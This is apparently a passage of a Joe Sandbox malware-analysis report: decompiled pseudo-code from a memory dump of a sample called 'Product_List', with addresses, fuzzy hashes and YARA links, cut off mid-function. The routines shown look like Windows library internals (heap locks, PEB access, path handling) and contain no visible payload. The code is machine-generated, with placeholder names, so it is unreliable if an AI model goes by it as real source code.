				unsigned int _t59;
				char _t75;
				signed int _t86;
				intOrPtr _t88;
				intOrPtr* _t91;

				_t75 = __edx;
				_t91 = __ecx;
				_v12 = __edx;
				_t50 = __ecx + 0x30;
				_t86 = _a4 & 0x00000001;
				if(_t86 == 0) {
					E01782280(_t26, _t50);
					_t75 = _v16;
				}
				_t58 = _t91;
				_t27 = E0182E815(_t58, _t75);
				_v8 = _t27;
				if(_t27 != 0) {
					E0176F900(_t91 + 0x34, _t27);
					if(_t86 == 0) {
						L0177FFB0(_t50, _t86, _t50);
					}
					_push( *((intOrPtr*)(_t91 + 4)));
					_push( *_t91);
					_t59 =  *(_v8 + 0x10);
					_t53 = 1 << (_t59 >> 0x00000002 & 0x0000003f);
					_push(0x8000);
					_t11 = _t53 - 1; // 0x0
					_t12 = _t53 - 1; // 0x0
					_v16 = ((_t59 >> 0x00000001 & 1) + (_t59 >> 0xc) << 0xc) - 1 + (1 << (_t59 >> 0x00000002 & 0x0000003f)) - (_t11 + ((_t59 >> 0x00000001 & 1) + (_t59 >> 0x0000000c) << 0x0000000c) & _t12);
					L0182AFDE( &_v12,  &_v16);
					asm("lock xadd [eax], ecx");
					asm("lock xadd [eax], ecx");
					E0182BCD2(_v8,  *_t91,  *((intOrPtr*)(_t91 + 4)));
					_t55 = _v36;
					_t88 = _v36;
					if(E01787D50() == 0) {
						_t40 = 0x7ffe0388;
					} else {
						_t55 = _v19;
						_t40 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
					}
					if( *_t40 != 0) {
						L0181FE3F(_t55, _t91, _v15, _t55);
					}
				} else {
					if(_t86 == 0) {
						L0177FFB0(_t50, _t86, _t50);
						_t75 = _v16;
					}
					_push(_t58);
					_t88 = 0;
					_push(0);
					E0182A80D(_t91, 8, _t75, 0);
				}
				return _t88;
			}






















                                                      0x0182ea55
                                                      0x0182ea66
                                                      0x0182ea68
                                                      0x0182ea6c
                                                      0x0182ea6f
                                                      0x0182ea72
                                                      0x0182ea75
                                                      0x0182ea7a
                                                      0x0182ea7a
                                                      0x0182ea7e
                                                      0x0182ea80
                                                      0x0182ea85
                                                      0x0182ea8b
                                                      0x0182eab5
                                                      0x0182eabc
                                                      0x0182eabf
                                                      0x0182eabf
                                                      0x0182eaca
                                                      0x0182eace
                                                      0x0182ead0
                                                      0x0182eae4
                                                      0x0182eaeb
                                                      0x0182eaf0
                                                      0x0182eaf5
                                                      0x0182eb09
                                                      0x0182eb0d
                                                      0x0182eb1d
                                                      0x0182eb2d
                                                      0x0182eb38
                                                      0x0182eb3d
                                                      0x0182eb41
                                                      0x0182eb4a
                                                      0x0182eb60
                                                      0x0182eb4c
                                                      0x0182eb52
                                                      0x0182eb59
                                                      0x0182eb59
                                                      0x0182eb68
                                                      0x0182eb71
                                                      0x0182eb71
                                                      0x0182ea8d
                                                      0x0182ea8f
                                                      0x0182ea92
                                                      0x0182ea97
                                                      0x0182ea97
                                                      0x0182ea9b
                                                      0x0182ea9c
                                                      0x0182ea9e
                                                      0x0182eaa6
                                                      0x0182eaa6
                                                      0x0182eb7e

                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.621527245.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1740000_Product_List.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: f5f831e91637f778ab1786019c0fe1c1c634a5059deceac50859eb6d9a86e6aa
                                                      • Instruction ID: b997686e7d6b4c5ce57c7837866705c43a2f1ccc5c114f0abc0d1d10aeb057ac
                                                      • Opcode Fuzzy Hash: f5f831e91637f778ab1786019c0fe1c1c634a5059deceac50859eb6d9a86e6aa
                                                      • Instruction Fuzzy Hash: 5B31C172604706ABC71ADF28C884A6BB7A9FFD0310F04492DE593C7645EE30E945CBA5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 017E69A6 Relevance: .1, Instructions: 108COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 69%
                                                      			E017E69A6(signed short* __ecx, void* __eflags) {
				signed int _v8;
				signed int _v16;
				intOrPtr _v20;
				signed int _v24;
				signed short _v28;
				signed int _v32;
				intOrPtr _v36;
				signed int _v40;
				char* _v44;
				signed int _v48;
				intOrPtr _v52;
				signed int _v56;
				char _v60;
				signed int _v64;
				char _v68;
				char _v72;
				signed short* _v76;
				signed int _v80;
				char _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t68;
				intOrPtr _t73;
				signed short* _t74;
				void* _t77;
				void* _t78;
				signed int _t79;
				signed int _t80;

				_v8 =  *0x185d360 ^ _t80;
				_t75 = 0x100;
				_v64 = _v64 & 0x00000000;
				_v76 = __ecx;
				_t79 = 0;
				_t68 = 0;
				_v72 = 1;
				_v68 =  *((intOrPtr*)( *[fs:0x18] + 0x20));
				_t77 = 0;
				if(L01776C59(__ecx[2], 0x100, __eflags) != 0) {
					_t79 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
					if(_t79 != 0 && E017E6BA3() != 0) {
						_push(0);
						_push(0);
						_push(0);
						_push(0x1f0003);
						_push( &_v64);
						if(E017A9980() >= 0) {
							E01782280(_t56, 0x1858778);
							_t77 = 1;
							_t68 = 1;
							if( *0x1858774 == 0) {
								asm("cdq");
								 *(_t79 + 0xf70) = _v64;
								 *(_t79 + 0xf74) = 0x100;
								_t75 = 0;
								_t73 = 4;
								_v60 =  &_v68;
								_v52 = _t73;
								_v36 = _t73;
								_t74 = _v76;
								_v44 =  &_v72;
								 *0x1858774 = 1;
								_v56 = 0;
								_v28 = _t74[2];
								_v48 = 0;
								_v20 = ( *_t74 & 0x0000ffff) + 2;
								_v40 = 0;
								_v32 = 0;
								_v24 = 0;
								_v16 = 0;
								if(L0176B6F0(0x174c338, 0x174c288, 3,  &_v60) == 0) {
									_v80 = _v80 | 0xffffffff;
									_push( &_v84);
									_push(0);
									_push(_v64);
									_v84 = 0xfa0a1f00;
									E017A9520();
								}
							}
						}
					}
				}
				if(_v64 != 0) {
					_push(_v64);
					E017A95D0();
					 *(_t79 + 0xf70) =  *(_t79 + 0xf70) & 0x00000000;
					 *(_t79 + 0xf74) =  *(_t79 + 0xf74) & 0x00000000;
				}
				if(_t77 != 0) {
					L0177FFB0(_t68, _t77, 0x1858778);
				}
				_pop(_t78);
				return L017AB640(_t68, _t68, _v8 ^ _t80, _t75, _t78, _t79);
			}
































                                                      0x017e69b5
                                                      0x017e69be
                                                      0x017e69c3
                                                      0x017e69c9
                                                      0x017e69cc
                                                      0x017e69d1
                                                      0x017e69d3
                                                      0x017e69de
                                                      0x017e69e1
                                                      0x017e69ea
                                                      0x017e69f6
                                                      0x017e69fe
                                                      0x017e6a13
                                                      0x017e6a14
                                                      0x017e6a15
                                                      0x017e6a16
                                                      0x017e6a1e
                                                      0x017e6a26
                                                      0x017e6a31
                                                      0x017e6a36
                                                      0x017e6a37
                                                      0x017e6a40
                                                      0x017e6a49
                                                      0x017e6a4a
                                                      0x017e6a53
                                                      0x017e6a59
                                                      0x017e6a5d
                                                      0x017e6a5e
                                                      0x017e6a64
                                                      0x017e6a67
                                                      0x017e6a6a
                                                      0x017e6a6d
                                                      0x017e6a70
                                                      0x017e6a77
                                                      0x017e6a7d
                                                      0x017e6a86
                                                      0x017e6a89
                                                      0x017e6a9c
                                                      0x017e6a9f
                                                      0x017e6aa2
                                                      0x017e6aa5
                                                      0x017e6aaf
                                                      0x017e6ab1
                                                      0x017e6ab8
                                                      0x017e6ab9
                                                      0x017e6abb
                                                      0x017e6abe
                                                      0x017e6ac5
                                                      0x017e6ac5
                                                      0x017e6aaf
                                                      0x017e6a40
                                                      0x017e6a26
                                                      0x017e69fe
                                                      0x017e6ace
                                                      0x017e6ad0
                                                      0x017e6ad3
                                                      0x017e6ad8
                                                      0x017e6adf
                                                      0x017e6adf
                                                      0x017e6ae8
                                                      0x017e6aef
                                                      0x017e6aef
                                                      0x017e6af9
                                                      0x017e6b06

                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.621527245.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1740000_Product_List.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: ecc3f560956124ca3ea27ae700003fe38a5c472d6c1c58dab6e43a4a0e013531
                                                      • Instruction ID: 42cefbd3ccf4691bafa26c311015f3bdb8865e1c16eeff83b7280fb6a21f34e6
                                                      • Opcode Fuzzy Hash: ecc3f560956124ca3ea27ae700003fe38a5c472d6c1c58dab6e43a4a0e013531
                                                      • Instruction Fuzzy Hash: 45417BB1D01209AFDB20DFAAC944BEEFBF8EF58714F14812AE914E3240DB749A05CB50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 01765210 Relevance: .1, Instructions: 107COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 85%
                                                      			E01765210(intOrPtr _a4, void* _a8) {
				void* __ecx;
				intOrPtr _t31;
				signed int _t32;
				signed int _t33;
				intOrPtr _t35;
				signed int _t52;
				void* _t54;
				void* _t56;
				unsigned int _t59;
				signed int _t60;
				void* _t61;

				_t61 = E017652A5(1);
				if(_t61 == 0) {
					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
					_t54 =  *((intOrPtr*)(_t31 + 0x28));
					_t59 =  *(_t31 + 0x24) & 0x0000ffff;
				} else {
					_t54 =  *((intOrPtr*)(_t61 + 0x10));
					_t59 =  *(_t61 + 0xc) & 0x0000ffff;
				}
				_t60 = _t59 >> 1;
				_t32 = 0x3a;
				if(_t60 < 2 ||  *((intOrPtr*)(_t54 + _t60 * 2 - 4)) == _t32) {
					_t52 = _t60 + _t60;
					if(_a4 > _t52) {
						goto L5;
					}
					if(_t61 != 0) {
						asm("lock xadd [esi], eax");
						if((_t32 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(_t61 + 4)));
							E017A95D0();
							L017877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
						}
					} else {
						E0177EB70(_t54, 0x18579a0);
					}
					_t26 = _t52 + 2; // 0xddeeddf0
					return _t26;
				} else {
					_t52 = _t60 + _t60;
					if(_a4 < _t52) {
						if(_t61 != 0) {
							asm("lock xadd [esi], eax");
							if((_t32 | 0xffffffff) == 0) {
								_push( *((intOrPtr*)(_t61 + 4)));
								E017A95D0();
								L017877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
							}
						} else {
							E0177EB70(_t54, 0x18579a0);
						}
						return _t52;
					}
					L5:
					_t33 = E017AF3E0(_a8, _t54, _t52);
					if(_t61 == 0) {
						E0177EB70(_t54, 0x18579a0);
					} else {
						asm("lock xadd [esi], eax");
						if((_t33 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(_t61 + 4)));
							E017A95D0();
							L017877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
						}
					}
					_t35 = _a8;
					if(_t60 <= 1) {
						L9:
						_t60 = _t60 - 1;
						 *((short*)(_t52 + _t35 - 2)) = 0;
						goto L10;
					} else {
						_t56 = 0x3a;
						if( *((intOrPtr*)(_t35 + _t60 * 2 - 4)) == _t56) {
							 *((short*)(_t52 + _t35)) = 0;
							L10:
							return _t60 + _t60;
						}
						goto L9;
					}
				}
			}














                                                      0x01765220
                                                      0x01765224
                                                      0x017c0d13
                                                      0x017c0d16
                                                      0x017c0d19
                                                      0x0176522a
                                                      0x0176522a
                                                      0x0176522d
                                                      0x0176522d
                                                      0x01765231
                                                      0x01765235
                                                      0x01765239
                                                      0x017c0d5c
                                                      0x017c0d62
                                                      0x00000000
                                                      0x00000000
                                                      0x017c0d6a
                                                      0x017c0d7b
                                                      0x017c0d7f
                                                      0x017c0d81
                                                      0x017c0d84
                                                      0x017c0d95
                                                      0x017c0d95
                                                      0x017c0d6c
                                                      0x017c0d71
                                                      0x017c0d71
                                                      0x017c0d9a
                                                      0x00000000
                                                      0x0176524a
                                                      0x0176524a
                                                      0x01765250
                                                      0x017c0d24
                                                      0x017c0d35
                                                      0x017c0d39
                                                      0x017c0d3b
                                                      0x017c0d3e
                                                      0x017c0d50
                                                      0x017c0d50
                                                      0x017c0d26
                                                      0x017c0d2b
                                                      0x017c0d2b
                                                      0x00000000
                                                      0x017c0d55
                                                      0x01765256
                                                      0x0176525b
                                                      0x01765265
                                                      0x017c0da7
                                                      0x0176526b
                                                      0x0176526e
                                                      0x01765272
                                                      0x017c0db1
                                                      0x017c0db4
                                                      0x017c0dc5
                                                      0x017c0dc5
                                                      0x01765272
                                                      0x01765278
                                                      0x0176527e
                                                      0x0176528a
                                                      0x0176528c
                                                      0x0176528d
                                                      0x00000000
                                                      0x01765280
                                                      0x01765282
                                                      0x01765288
                                                      0x0176529f
                                                      0x01765292
                                                      0x00000000
                                                      0x01765292
                                                      0x00000000
                                                      0x01765288
                                                      0x0176527e

                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.621527245.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1740000_Product_List.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 38c8e24deabd7519b9d0c502e22bcc4b5a57ae25cb149edf9aea66bf7dc7823b
                                                      • Instruction ID: 14610e16837a2f31d18b292ba711db4f9d271b3ec8c8da574d79130765561b16
                                                      • Opcode Fuzzy Hash: 38c8e24deabd7519b9d0c502e22bcc4b5a57ae25cb149edf9aea66bf7dc7823b
                                                      • Instruction Fuzzy Hash: F0311671245601EFC726AB18C885F2AFBA9FF50B60F10466EF9564B2A4DB20ED40C6D0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 017A3D43 Relevance: .1, Instructions: 106COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E017A3D43(signed short* __ecx, signed short* __edx, signed short* _a4, signed short** _a8, intOrPtr* _a12, intOrPtr* _a16) {
				intOrPtr _v8;
				char _v12;
				signed short** _t33;
				short* _t38;
				intOrPtr* _t39;
				intOrPtr* _t41;
				signed short _t43;
				intOrPtr* _t47;
				intOrPtr* _t53;
				signed short _t57;
				intOrPtr _t58;
				signed short _t60;
				signed short* _t61;

				_t47 = __ecx;
				_t61 = __edx;
				_t60 = ( *__ecx & 0x0000ffff) + 2;
				if(_t60 > 0xfffe) {
					L22:
					return 0xc0000106;
				}
				if(__edx != 0) {
					if(_t60 <= ( *(__edx + 2) & 0x0000ffff)) {
						L5:
						E01777B60(0, _t61, 0x17411c4);
						_v12 =  *_t47;
						_v12 = _v12 + 0xfff8;
						_v8 =  *((intOrPtr*)(_t47 + 4)) + 8;
						E01777B60(0xfff8, _t61,  &_v12);
						_t33 = _a8;
						if(_t33 != 0) {
							 *_t33 = _t61;
						}
						 *((short*)(_t61[2] + (( *_t61 & 0x0000ffff) >> 1) * 2)) = 0;
						_t53 = _a12;
						if(_t53 != 0) {
							_t57 = _t61[2];
							_t38 = _t57 + ((( *_t61 & 0x0000ffff) >> 1) - 1) * 2;
							while(_t38 >= _t57) {
								if( *_t38 == 0x5c) {
									_t41 = _t38 + 2;
									if(_t41 == 0) {
										break;
									}
									_t58 = 0;
									if( *_t41 == 0) {
										L19:
										 *_t53 = _t58;
										goto L7;
									}
									 *_t53 = _t41;
									goto L7;
								}
								_t38 = _t38 - 2;
							}
							_t58 = 0;
							goto L19;
						} else {
							L7:
							_t39 = _a16;
							if(_t39 != 0) {
								 *_t39 = 0;
								 *((intOrPtr*)(_t39 + 4)) = 0;
								 *((intOrPtr*)(_t39 + 8)) = 0;
								 *((intOrPtr*)(_t39 + 0xc)) = 0;
							}
							return 0;
						}
					}
					_t61 = _a4;
					if(_t61 != 0) {
						L3:
						_t43 = L01784620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t60);
						_t61[2] = _t43;
						if(_t43 == 0) {
							return 0xc0000017;
						}
						_t61[1] = _t60;
						 *_t61 = 0;
						goto L5;
					}
					goto L22;
				}
				_t61 = _a4;
				if(_t61 == 0) {
					return 0xc000000d;
				}
				goto L3;
			}
















                                                      0x017a3d4c
                                                      0x017a3d50
                                                      0x017a3d55
                                                      0x017a3d5e
                                                      0x017de79a
                                                      0x00000000
                                                      0x017de79a
                                                      0x017a3d68
                                                      0x017de789
                                                      0x017a3d9d
                                                      0x017a3da3
                                                      0x017a3daf
                                                      0x017a3db5
                                                      0x017a3dbc
                                                      0x017a3dc4
                                                      0x017a3dc9
                                                      0x017a3dce
                                                      0x017de7ae
                                                      0x017de7ae
                                                      0x017a3dde
                                                      0x017a3de2
                                                      0x017a3de7
                                                      0x017a3e0d
                                                      0x017a3e13
                                                      0x017a3e16
                                                      0x017a3e1e
                                                      0x017a3e25
                                                      0x017a3e28
                                                      0x00000000
                                                      0x00000000
                                                      0x017a3e2a
                                                      0x017a3e2f
                                                      0x017a3e37
                                                      0x017a3e37
                                                      0x00000000
                                                      0x017a3e37
                                                      0x017a3e31
                                                      0x00000000
                                                      0x017a3e31
                                                      0x017a3e20
                                                      0x017a3e20
                                                      0x017a3e35
                                                      0x00000000
                                                      0x017a3de9
                                                      0x017a3de9
                                                      0x017a3de9
                                                      0x017a3dee
                                                      0x017a3dfd
                                                      0x017a3dff
                                                      0x017a3e02
                                                      0x017a3e05
                                                      0x017a3e05
                                                      0x00000000
                                                      0x017a3df0
                                                      0x017a3de7
                                                      0x017de78f
                                                      0x017de794
                                                      0x017a3d79
                                                      0x017a3d84
                                                      0x017a3d89
                                                      0x017a3d8e
                                                      0x00000000
                                                      0x017de7a4
                                                      0x017a3d96
                                                      0x017a3d9a
                                                      0x00000000
                                                      0x017a3d9a
                                                      0x00000000
                                                      0x017de794
                                                      0x017a3d6e
                                                      0x017a3d73
                                                      0x00000000
                                                      0x017de7b5
                                                      0x00000000

                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.621527245.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1740000_Product_List.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 64251bd6921e7a00c9491235f9ba7947fb3ea6b0a44b722235f1e777e199378d
                                                      • Instruction ID: 64c48935aab4089b36e111d7fd140af033b2245b03d7d9c46ca3e13db2103865
                                                      • Opcode Fuzzy Hash: 64251bd6921e7a00c9491235f9ba7947fb3ea6b0a44b722235f1e777e199378d
                                                      • Instruction Fuzzy Hash: 8531DE32A05615DBD7298F2DC841A3AFBF4FF99710B4582AEE949CB350EB30D880C790
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0178C182 Relevance: .1, Instructions: 104COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 68%
                                                      			E0178C182(void* __ecx, unsigned int* __edx, intOrPtr _a4) {
				signed int* _v8;
				char _v16;
				void* __ebx;
				void* __edi;
				signed char _t33;
				signed char _t43;
				signed char _t48;
				signed char _t62;
				void* _t63;
				intOrPtr _t69;
				intOrPtr _t71;
				unsigned int* _t82;
				void* _t83;

				_t80 = __ecx;
				_t82 = __edx;
				_t33 =  *((intOrPtr*)(__ecx + 0xde));
				_t62 = _t33 >> 0x00000001 & 0x00000001;
				if((_t33 & 0x00000001) != 0) {
					_v8 = ((0 | _t62 != 0x00000000) - 0x00000001 & 0x00000048) + 8 + __edx;
					if(E01787D50() != 0) {
						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
					} else {
						_t43 = 0x7ffe0386;
					}
					if( *_t43 != 0) {
						_t43 = E01838D34(_v8, _t80);
					}
					E01782280(_t43, _t82);
					if( *((char*)(_t80 + 0xdc)) == 0) {
						L0177FFB0(_t62, _t80, _t82);
						 *(_t80 + 0xde) =  *(_t80 + 0xde) | 0x00000004;
						_t30 = _t80 + 0xd0; // 0xd0
						_t83 = _t30;
						E01838833(_t83,  &_v16);
						_t81 = _t80 + 0x90;
						L0177FFB0(_t62, _t80 + 0x90, _t80 + 0x90);
						_t63 = 0;
						_push(0);
						_push(_t83);
						_t48 = E017AB180();
						if(_a4 != 0) {
							E01782280(_t48, _t81);
						}
					} else {
						_t69 = _v8;
						_t12 = _t80 + 0x98; // 0x98
						_t13 = _t69 + 0xc; // 0x575651ff
						E0178BB2D(_t13, _t12);
						_t71 = _v8;
						_t15 = _t80 + 0xb0; // 0xb0
						_t16 = _t71 + 8; // 0x8b000cc2
						E0178BB2D(_t16, _t15);
						E0178B944(_v8, _t62);
						 *((char*)(_t80 + 0xdc)) = 0;
						L0177FFB0(0, _t80, _t82);
						 *((intOrPtr*)(_t80 + 0xd8)) = 0;
						 *((intOrPtr*)(_t80 + 0xc8)) = 0;
						 *((intOrPtr*)(_t80 + 0xcc)) = 0;
						 *(_t80 + 0xde) = 0;
						if(_a4 == 0) {
							_t25 = _t80 + 0x90; // 0x90
							L0177FFB0(0, _t80, _t25);
						}
						_t63 = 1;
					}
					return _t63;
				}
				 *((intOrPtr*)(__ecx + 0xc8)) = 0;
				 *((intOrPtr*)(__ecx + 0xcc)) = 0;
				if(_a4 == 0) {
					_t24 = _t80 + 0x90; // 0x90
					L0177FFB0(0, __ecx, _t24);
				}
				return 0;
			}
















                                                      0x0178c18d
                                                      0x0178c18f
                                                      0x0178c191
                                                      0x0178c19b
                                                      0x0178c1a0
                                                      0x0178c1d4
                                                      0x0178c1de
                                                      0x017d2d6e
                                                      0x0178c1e4
                                                      0x0178c1e4
                                                      0x0178c1e4
                                                      0x0178c1ec
                                                      0x017d2d7d
                                                      0x017d2d7d
                                                      0x0178c1f3
                                                      0x0178c1ff
                                                      0x017d2d88
                                                      0x017d2d8d
                                                      0x017d2d94
                                                      0x017d2d94
                                                      0x017d2d9f
                                                      0x017d2da4
                                                      0x017d2dab
                                                      0x017d2db0
                                                      0x017d2db2
                                                      0x017d2db3
                                                      0x017d2db4
                                                      0x017d2dbc
                                                      0x017d2dc3
                                                      0x017d2dc3
                                                      0x0178c205
                                                      0x0178c205
                                                      0x0178c208
                                                      0x0178c20e
                                                      0x0178c211
                                                      0x0178c216
                                                      0x0178c219
                                                      0x0178c21f
                                                      0x0178c222
                                                      0x0178c22c
                                                      0x0178c234
                                                      0x0178c23a
                                                      0x0178c23f
                                                      0x0178c245
                                                      0x0178c24b
                                                      0x0178c251
                                                      0x0178c25a
                                                      0x0178c276
                                                      0x0178c27d
                                                      0x0178c27d
                                                      0x0178c25c
                                                      0x0178c25c
                                                      0x00000000
                                                      0x0178c25e
                                                      0x0178c1a4
                                                      0x0178c1aa
                                                      0x0178c1b3
                                                      0x0178c265
                                                      0x0178c26c
                                                      0x0178c26c
                                                      0x00000000

                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.621527245.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1740000_Product_List.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
                                                      • Instruction ID: e0b090c1fd5cb7f56887d61f9c5829fc8d813641127b798e2cf0df86d323c2df
                                                      • Opcode Fuzzy Hash: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
                                                      • Instruction Fuzzy Hash: 0C315A71B4558BBEDB06FBB8C484BE9FB64BF52200F08415AD51C87245DB346A46C7E1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 017E7016 Relevance: .1, Instructions: 104COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 76%
                                                      			E017E7016(short __ecx, intOrPtr __edx, char _a4, char _a8, signed short* _a12, signed short* _a16) {
				signed int _v8;
				char _v588;
				intOrPtr _v592;
				intOrPtr _v596;
				signed short* _v600;
				char _v604;
				short _v606;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short* _t55;
				void* _t56;
				signed short* _t58;
				signed char* _t61;
				char* _t68;
				void* _t69;
				void* _t71;
				void* _t72;
				signed int _t75;

				_t64 = __edx;
				_t77 = (_t75 & 0xfffffff8) - 0x25c;
				_v8 =  *0x185d360 ^ (_t75 & 0xfffffff8) - 0x0000025c;
				_t55 = _a16;
				_v606 = __ecx;
				_t71 = 0;
				_t58 = _a12;
				_v596 = __edx;
				_v600 = _t58;
				_t68 =  &_v588;
				if(_t58 != 0) {
					_t71 = ( *_t58 & 0x0000ffff) + 2;
					if(_t55 != 0) {
						_t71 = _t71 + ( *_t55 & 0x0000ffff) + 2;
					}
				}
				_t8 = _t71 + 0x2a; // 0x28
				_t33 = _t8;
				_v592 = _t8;
				if(_t71 <= 0x214) {
					L6:
					 *((short*)(_t68 + 6)) = _v606;
					if(_t64 != 0xffffffff) {
						asm("cdq");
						 *((intOrPtr*)(_t68 + 0x20)) = _t64;
						 *((char*)(_t68 + 0x28)) = _a4;
						 *((intOrPtr*)(_t68 + 0x24)) = _t64;
						 *((char*)(_t68 + 0x29)) = _a8;
						if(_t71 != 0) {
							_t22 = _t68 + 0x2a; // 0x2a
							_t64 = _t22;
							E017E6B4C(_t58, _t22, _t71,  &_v604);
							if(_t55 != 0) {
								_t25 = _v604 + 0x2a; // 0x2a
								_t64 = _t25 + _t68;
								E017E6B4C(_t55, _t25 + _t68, _t71 - _v604,  &_v604);
							}
							if(E01787D50() == 0) {
								_t61 = 0x7ffe0384;
							} else {
								_t61 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							}
							_push(_t68);
							_push(_v592 + 0xffffffe0);
							_push(0x402);
							_push( *_t61 & 0x000000ff);
							E017A9AE0();
						}
					}
					_t35 =  &_v588;
					if( &_v588 != _t68) {
						_t35 = L017877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t68);
					}
					L16:
					_pop(_t69);
					_pop(_t72);
					_pop(_t56);
					return L017AB640(_t35, _t56, _v8 ^ _t77, _t64, _t69, _t72);
				}
				_t68 = L01784620(_t58,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t33);
				if(_t68 == 0) {
					goto L16;
				} else {
					_t58 = _v600;
					_t64 = _v596;
					goto L6;
				}
			}






















                                                      0x017e7016
                                                      0x017e701e
                                                      0x017e702b
                                                      0x017e7033
                                                      0x017e7037
                                                      0x017e703c
                                                      0x017e703e
                                                      0x017e7041
                                                      0x017e7045
                                                      0x017e704a
                                                      0x017e7050
                                                      0x017e7055
                                                      0x017e705a
                                                      0x017e7062
                                                      0x017e7062
                                                      0x017e705a
                                                      0x017e7064
                                                      0x017e7064
                                                      0x017e7067
                                                      0x017e7071
                                                      0x017e7096
                                                      0x017e709b
                                                      0x017e70a2
                                                      0x017e70a6
                                                      0x017e70a7
                                                      0x017e70ad
                                                      0x017e70b3
                                                      0x017e70b6
                                                      0x017e70bb
                                                      0x017e70c3
                                                      0x017e70c3
                                                      0x017e70c6
                                                      0x017e70cd
                                                      0x017e70dd
                                                      0x017e70e0
                                                      0x017e70e2
                                                      0x017e70e2
                                                      0x017e70ee
                                                      0x017e7101
                                                      0x017e70f0
                                                      0x017e70f9
                                                      0x017e70f9
                                                      0x017e710a
                                                      0x017e710e
                                                      0x017e7112
                                                      0x017e7117
                                                      0x017e7118
                                                      0x017e7118
                                                      0x017e70bb
                                                      0x017e711d
                                                      0x017e7123
                                                      0x017e7131
                                                      0x017e7131
                                                      0x017e7136
                                                      0x017e713d
                                                      0x017e713e
                                                      0x017e713f
                                                      0x017e714a
                                                      0x017e714a
                                                      0x017e7084
                                                      0x017e7088
                                                      0x00000000
                                                      0x017e708e
                                                      0x017e708e
                                                      0x017e7092
                                                      0x00000000
                                                      0x017e7092

                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.621527245.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1740000_Product_List.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: de8d26e70bf265d09589fca5c494a4964dbf7430f95d83e009193bdd84af76e1
                                                      • Instruction ID: b356eae3b7dade07d2194e1b37040c50aba3d7f2d497a9a154aed2827aa90827
                                                      • Opcode Fuzzy Hash: de8d26e70bf265d09589fca5c494a4964dbf7430f95d83e009193bdd84af76e1
                                                      • Instruction Fuzzy Hash: AF31C2726047519BC324DF68C944A6AF7E9FFCC700F144A29F99587694E730E904CBE6
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 017961A0 Relevance: .1, Instructions: 93COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 97%
                                                      			E017961A0(signed int* __ecx) {
				intOrPtr _v8;
				char _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				intOrPtr _t30;
				intOrPtr _t31;
				void* _t32;
				intOrPtr _t33;
				intOrPtr _t37;
				intOrPtr _t49;
				signed int _t51;
				intOrPtr _t52;
				signed int _t54;
				void* _t59;
				signed int* _t61;
				intOrPtr* _t64;

				_t61 = __ecx;
				_v12 = 0;
				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
				_v16 = __ecx;
				_v8 = 0;
				if(_t30 == 0) {
					L6:
					_t31 = 0;
